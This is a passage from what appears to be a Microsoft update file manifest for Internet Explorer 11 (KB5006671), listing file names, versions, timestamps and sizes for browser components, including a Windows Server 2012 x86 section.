11.0.9600.20139| 13-Sep-2021| 21:49| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:59| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:58| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:58| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:58| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 35,328 \nwininet.dll| 11.0.9600.20139| 13-Sep-2021| 20:06| 4,147,712 \njsproxy.dll| 11.0.9600.17416| 30-Oct-2014| 19:43| 39,936 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 114,176 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 124,928 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 122,880 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 130,048 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 138,240 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18698| 14-May-2017| 12:41| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 131,584 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 117,760 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 122,368 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 134,144 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 107,008 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 0:14| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 127,488 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 128,512 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 88,064 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 0:14| 82,944 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 120,320 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 125,952 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 128,000 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 123,904 \ninetcpl.cpl.mui| 11.0.9600.20139| 13-Sep-2021| 21:49| 124,416 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 121,856 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:21| 115,712 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:21| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:22| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:21| 74,752 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 75,776 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 75,776 \nieui.dll| 11.0.9600.19650| 11-Feb-2020| 4:46| 427,520 \niedkcs32.dll| 18.0.9600.19963| 12-Feb-2021| 17:52| 292,864 \ninstall.ins| Not versioned| 13-Sep-2021| 19:03| 464 \nieapfltr.dat| 10.0.9301.0| 23-Sep-2013| 19:22| 616,104 \nieapfltr.dll| 11.0.9600.20139| 13-Sep-2021| 20:09| 548,864 \niepeers.dll| 11.0.9600.19963| 12-Feb-2021| 17:59| 107,008 \nlicmgr10.dll| 11.0.9600.17416| 30-Oct-2014| 19:34| 23,552 \ntdc.ocx| 11.0.9600.19963| 12-Feb-2021| 18:02| 62,464 \nDiagnosticsHub.DataWarehouse.dll| 11.0.9600.17416| 30-Oct-2014| 19:52| 495,616 \niedvtool.dll| 11.0.9600.20045| 4-Jun-2021| 21:19| 726,016 \nDiagnosticsHub_is.dll| 11.0.9600.19963| 12-Feb-2021| 18:22| 39,936 \ndxtmsft.dll| 11.0.9600.19963| 12-Feb-2021| 18:06| 364,032 \ndxtrans.dll| 11.0.9600.19963| 12-Feb-2021| 17:58| 221,696 \nMicrosoft-Windows-IE-F12-Provider.ptxml| Not versioned| 15-Aug-2014| 15:50| 11,892 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:20| 4,096 \nF12.dll.mui| 11.0.9600.17278| 15-Aug-2014| 18:39| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:28| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:17| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:26| 4,096 \nF12.dll.mui| 11.0.9600.20139| 13-Sep-2021| 21:48| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:26| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:26| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:26| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 3,584 \nDiagnosticsTap.dll| 11.0.9600.20045| 4-Jun-2021| 21:17| 175,616 \nF12Resources.dll| 11.0.9600.17496| 21-Nov-2014| 17:44| 10,948,608 \nF12Tools.dll| 11.0.9600.20045| 4-Jun-2021| 21:16| 263,680 \nF12.dll| 11.0.9600.20045| 4-Jun-2021| 21:08| 1,186,304 \nmsfeeds.dll| 11.0.9600.20139| 13-Sep-2021| 20:22| 587,776 \nmsfeeds.mof| Not versioned| 5-Feb-2014| 21:51| 1,518 \nmsfeedsbs.mof| Not versioned| 21-Aug-2013| 16:43| 1,574 \nmsfeedsbs.dll| 11.0.9600.19650| 11-Feb-2020| 4:34| 43,520 \nmsfeedssync.exe| 11.0.9600.16384| 21-Aug-2013| 20:05| 11,776 \nmshtmled.dll| 11.0.9600.19963| 12-Feb-2021| 18:00| 73,216 \nmshtml.dll| 11.0.9600.20139| 13-Sep-2021| 20:23| 16,229,888 \nmshtml.tlb| 11.0.9600.16518| 6-Feb-2014| 1:36| 2,724,864 \nMicrosoft-Windows-IE-HTMLRendering.ptxml| Not versioned| 5-Feb-2014| 21:39| 3,228 \nIEAdvpack.dll| 11.0.9600.16384| 21-Aug-2013| 19:54| 98,816 \nieetwcollector.exe| 11.0.9600.18658| 5-Apr-2017| 10:29| 98,816 \nieetwproxystub.dll| 11.0.9600.16518| 6-Feb-2014| 1:23| 43,008 \nieetwcollectorres.dll| 11.0.9600.16518| 6-Feb-2014| 1:36| 4,096 \nielowutil.exe| 11.0.9600.17031| 22-Feb-2014| 1:32| 222,208 \nieproxy.dll| 11.0.9600.19963| 12-Feb-2021| 17:33| 308,224 \nIEShims.dll| 11.0.9600.19650| 11-Feb-2020| 4:11| 268,800 \nimgutil.dll| 11.0.9600.19963| 12-Feb-2021| 17:43| 34,816 \nWindows Pop-up Blocked.wav| Not versioned| 23-Sep-2013| 20:25| 85,548 \nWindows Information Bar.wav| Not versioned| 23-Sep-2013| 20:25| 23,308 \nWindows Feed Discovered.wav| Not versioned| 23-Sep-2013| 20:25| 19,884 \nWindows Navigation Start.wav| Not versioned| 23-Sep-2013| 20:25| 11,340 \nbing.ico| Not versioned| 23-Sep-2013| 19:51| 5,430 \nieUnatt.exe| 11.0.9600.16518| 6-Feb-2014| 1:12| 112,128 \nMicrosoft-Windows-IE-InternetExplorer-ppdlic.xrm-ms| Not versioned| 13-Sep-2021| 21:21| 2,956 \njsdbgui.dll| 11.0.9600.19963| 12-Feb-2021| 18:01| 457,216 \njsprofilerui.dll| 11.0.9600.19963| 12-Feb-2021| 18:01| 574,976 \nMemoryAnalyzer.dll| 11.0.9600.19963| 12-Feb-2021| 18:12| 1,935,360 \nMshtmlDac.dll| 11.0.9600.19867| 12-Oct-2020| 21:22| 60,928 \nnetworkinspection.dll| 11.0.9600.19963| 12-Feb-2021| 17:57| 1,105,408 \noccache.dll| 11.0.9600.19867| 12-Oct-2020| 21:01| 121,856 \ndesktop.ini| Not versioned| 18-Jun-2013| 7:46| 65 \nwebcheck.dll| 11.0.9600.19867| 12-Oct-2020| 20:57| 201,216 \ndesktop.ini| Not versioned| 18-Jun-2013| 7:46| 65 \npdm.dll| 12.0.20712.1| 26-Jul-2013| 10:03| 420,752 \nmsdbg2.dll| 12.0.20712.1| 26-Jul-2013| 10:03| 295,320 \npdmproxy100.dll| 12.0.20712.1| 26-Jul-2013| 10:03| 76,712 \nmsrating.dll| 11.0.9600.17905| 15-Jun-2015| 12:46| 157,184 \nicrav03.rat| Not versioned| 23-Sep-2013| 19:32| 8,798 \nticrf.rat| Not versioned| 23-Sep-2013| 19:32| 1,988 \niertutil.dll| 11.0.9600.20064| 14-Jun-2021| 20:45| 2,186,240 \nie4uinit.exe| 11.0.9600.19963| 12-Feb-2021| 17:52| 678,400 \niernonce.dll| 11.0.9600.16518| 6-Feb-2014| 1:15| 28,160 \niesetup.dll| 11.0.9600.16518| 6-Feb-2014| 1:23| 59,904 \nieuinit.inf| Not versioned| 12-Mar-2015| 18:46| 16,303 \ninseng.dll| 11.0.9600.16384| 21-Aug-2013| 19:35| 77,312 \niesysprep.dll| 11.0.9600.17416| 30-Oct-2014| 19:28| 87,552 \nTimeline.dll| 11.0.9600.19963| 12-Feb-2021| 18:02| 155,648 \nTimeline_is.dll| 11.0.9600.19963| 12-Feb-2021| 18:14| 130,048 \nTimeline.cpu.xml| Not versioned| 24-Jul-2014| 12:09| 3,197 \nVGX.dll| 11.0.9600.19963| 12-Feb-2021| 18:00| 734,720 \nurl.dll| 11.0.9600.17416| 30-Oct-2014| 19:49| 236,032 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:51| 2,066,432 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:51| 2,121,216 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:51| 2,075,136 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:51| 2,063,872 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:51| 2,314,240 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:54| 2,390,528 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:53| 2,034,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:03| 2,033,152 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:53| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:54| 2,255,872 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:53| 2,061,312 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:51| 2,326,016 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:54| 2,019,840 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:53| 2,071,040 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:53| 2,082,816 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:53| 2,170,368 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:53| 2,153,984 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,291,712 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,283,520 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,052,096 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,301,952 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,093,056 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:53| 2,075,648 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,299,392 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,094,592 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,316,800 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,305,536 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,278,912 \nieframe.dll.mui| 11.0.9600.20139| 13-Sep-2021| 21:51| 2,286,080 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,060,288 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:49| 2,315,776 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:49| 2,278,912 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:48| 2,324,992 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:49| 2,098,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:51| 1,890,304 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:50| 1,890,304 \nieframe.dll| 11.0.9600.20139| 13-Sep-2021| 20:11| 12,317,696 \nieframe.ptxml| Not versioned| 5-Feb-2014| 21:38| 24,486 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:34| 526,294 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:34| 499,654 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:34| 552,337 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:32| 944,559 \nInetRes.adml| Not versioned| 12-Feb-2021| 18:45| 457,561 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:32| 543,946 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:32| 526,557 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:33| 575,838 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:32| 570,737 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:31| 548,119 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:31| 639,271 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:31| 525,504 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:31| 488,488 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:31| 548,494 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:30| 559,343 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:30| 535,067 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:30| 541,455 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:30| 804,470 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:30| 503,909 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:30| 521,583 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:30| 420,082 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:33| 436,651 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:33| 436,651 \ninetres.admx| Not versioned| 11-Jan-2021| 19:24| 1,678,023 \ninetcomm.dll| 6.3.9600.20139| 13-Sep-2021| 20:25| 675,328 \nINETRES.dll| 6.3.9600.16384| 21-Aug-2013| 20:15| 84,480 \njscript9.dll| 11.0.9600.20139| 13-Sep-2021| 20:17| 3,571,712 \njscript9diag.dll| 11.0.9600.20045| 4-Jun-2021| 21:23| 557,568 \njscript.dll| 5.8.9600.20139| 13-Sep-2021| 20:41| 516,096 \nvbscript.dll| 5.8.9600.20139| 13-Sep-2021| 20:45| 403,968 \n \n### **Windows Server 2012**\n\n## \n\n__\n\nInternet Explorer 11 on all supported x86-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nFileinfo.xml| Not versioned| 15-Sep-21| 13:52| 590,400 \nIe11-windows6.2-kb5006671-x86-express.cab| Not versioned| 15-Sep-21| 12:29| 731,048 \nIe11-windows6.2-kb5006671-x86.msu| Not versioned| 15-Sep-21| 11:59| 27,623,941 \nIe11-windows6.2-kb5006671-x86.psf| Not versioned| 15-Sep-21| 12:13| 184,416,961 \nPackageinfo.xml| Not versioned| 15-Sep-21| 13:52| 1,133 \nPackagestructure.xml| Not versioned| 15-Sep-21| 13:52| 149,422 \nPrebvtpackageinfo.xml| Not versioned| 15-Sep-21| 13:52| 573 \nIe11-windows6.2-kb5006671-x86.cab| Not versioned| 15-Sep-21| 11:45| 27,494,544 \nIe11-windows6.2-kb5006671-x86.xml| Not versioned| 15-Sep-21| 11:49| 450 \nWsusscan.cab| Not versioned| 15-Sep-21| 11:52| 173,380 \nUrlmon.dll| 11.0.9600.20139| 14-Sep-21| 3:23| 1,342,976 \nIexplore.exe| 11.0.9600.20139| 15-Sep-21| 7:58| 810,384 \nWininet.dll.mui| 11.0.9600.20139| 15-Sep-21| 7:59| 46,592 \nWininet.dll.mui| 11.0.9600.20139| 15-Sep-21| 7:59| 52,736 \nWininet.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:00| 51,200 \nWininet.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:01| 56,320 \nWininet.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:02| 57,856 \nWininet.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:02| 54,272 \nWininet.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:03| 47,616 \nWininet.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:04| 49,152 \nWininet.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:04| 55,296 \nWininet.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:05| 45,056 \nWininet.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:06| 51,712 \nWininet.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:07| 53,248 \nWininet.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:08| 39,424 \nWininet.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:08| 35,840 \nWininet.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:09| 50,176 \nWininet.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:10| 51,200 \nWininet.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:10| 50,688 \nWininet.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:11| 52,736 \nWininet.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:12| 53,760 \nWininet.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:12| 54,272 \nWininet.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:13| 54,272 \nWininet.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:14| 52,736 \nWininet.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:14| 51,200 \nWininet.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:15| 53,248 \nWininet.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:16| 52,736 \nWininet.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:16| 51,712 \nWininet.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:17| 50,688 \nWininet.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:18| 50,688 \nWininet.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:19| 50,176 \nWininet.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:20| 30,720 \nWininet.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:21| 30,720 \nInetcpl.cpl| 11.0.9600.20139| 14-Sep-21| 3:40| 2,058,752 \nMshtml.dll.mui| 11.0.9600.20139| 15-Sep-21| 7:59| 307,200 \nMshtml.dll.mui| 11.0.9600.20139| 15-Sep-21| 7:59| 293,888 \nMshtml.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:00| 290,304 \nMshtml.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:01| 289,280 \nMshtml.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:01| 299,008 \nMshtml.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:02| 303,104 \nMshtml.dll.mui| 11.0.9600.20139| 15-Sep-21| 9:57| 282,112 \nMshtml.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:02| 296,960 \nMshtml.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:03| 283,648 \nMshtml.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:04| 291,840 \nMshtml.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:05| 299,520 \nMshtml.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:05| 275,968 \nMshtml.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:06| 290,816 \nMshtml.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:07| 293,376 \nMshtml.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:07| 296,960 \nMshtml.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:08| 258,048 \nMshtml.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:09| 256,512 \nMshtml.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:09| 289,280 \nMshtml.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:10| 288,256 \nMshtml.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:10| 285,184 \nMshtml.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:11| 295,424 \nMshtml.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:12| 297,472 \nMshtml.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:12| 292,864 \nMshtml.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:13| 295,424 \nMshtml.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:14| 294,400 \nMshtml.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:16| 292,864 \nMshtml.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:16| 290,816 \nMshtml.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:17| 288,768 \nMshtml.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:18| 286,208 \nMshtml.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:18| 281,600 \nMshtml.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:19| 286,720 \nMshtml.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:19| 292,352 \nMshtml.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:20| 242,176 \nMshtml.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:21| 243,200 \nUrlmon.dll.mui| 11.0.9600.20139| 15-Sep-21| 7:59| 46,080 \nUrlmon.dll.mui| 11.0.9600.20139| 15-Sep-21| 7:59| 50,176 \nUrlmon.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:00| 48,640 \nUrlmon.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:00| 49,664 \nUrlmon.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:01| 51,712 \nUrlmon.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:02| 54,272 \nUrlmon.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:02| 50,176 \nUrlmon.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:03| 47,616 \nUrlmon.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:04| 49,152 \nUrlmon.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:04| 50,688 \nUrlmon.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:05| 45,056 \nUrlmon.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:06| 49,152 \nUrlmon.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:07| 49,664 \nUrlmon.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:08| 39,936 \nUrlmon.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:09| 39,424 \nUrlmon.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:09| 47,616 \nUrlmon.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:10| 47,616 \nUrlmon.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:11| 48,640 \nUrlmon.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:11| 51,200 \nUrlmon.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:12| 50,688 \nUrlmon.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:13| 49,664 \nUrlmon.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:13| 50,176 \nUrlmon.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:14| 49,152 \nUrlmon.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:14| 48,640 \nUrlmon.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:15| 50,176 \nUrlmon.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:16| 48,640 \nUrlmon.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:16| 49,664 \nUrlmon.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:17| 48,640 \nUrlmon.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:18| 48,128 \nUrlmon.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:19| 49,152 \nUrlmon.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:20| 48,128 \nUrlmon.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:20| 35,328 \nUrlmon.dll.mui| 11.0.9600.20139| 15-Sep-21| 8:21| 35,328 \nJsproxy.dll| 11.0.9600.20139| 14-Sep-21| 4:03| 47,104 \nWininet.dll| 11.0.9600.20139| 14-Sep-21| 3:27| 4,387,840 \nInetcpl.cpl.mui| 11.0.9600.20139| 15-Sep-21| 7:58| 114,176 \nInetcpl.cpl.mui| 11.0.9600.20139| 15-Sep-21| 8:00| 130,560 \nInetcpl.cpl.mui| 11.0.9600.20139| 15-Sep-21| 8:00| 124,928 \nInetcpl.cpl.mui| 11.0.9600.20139| 15-Sep-21| 8:01| 122,880 \nInetcpl.cpl.mui| 11.0.9600.20139| 15-Sep-21| 8:01| 130,048 \nInetcpl.cpl.mui| 11.0.9600.20139| 15-Sep-21| 8:02| 138,240 \nInetcpl.cpl.mui| 11.0.9600.20139| 15-Sep-21| 9:57| 114,688 \nInetcpl.cpl.mui| 11.0.9600.20139| 15-Sep-21| 8:03| 131,584 \nInetcpl.cpl.mui| 11.0.9600.20139| 15-Sep-21| 8:03| 117,760 \nInetcpl.cpl.mui| 11.0.9600.20139| 15-Sep-21| 8:04| 122,368 \nInetcpl.cpl.mui| 11.0.9600.20139| 15-Sep-21| 8:04| 134,144 \nInetcpl.cpl.mui| 11.0.9600.20139| 15-Sep-21| 8:05| 107,008 \nInetcpl.cpl.mui| 11.0.9600.20139| 15-Sep-21| 8:06| 123,392 \nInetcpl.cpl.mui| 11.0.9600.20139| 15-Sep-21| 8:07| 127,488 \nInetcpl.cpl.mui| 11.0.9600.20139| 15-Sep-21| 8:07| 128,512 \nInetcpl.cpl.mui| 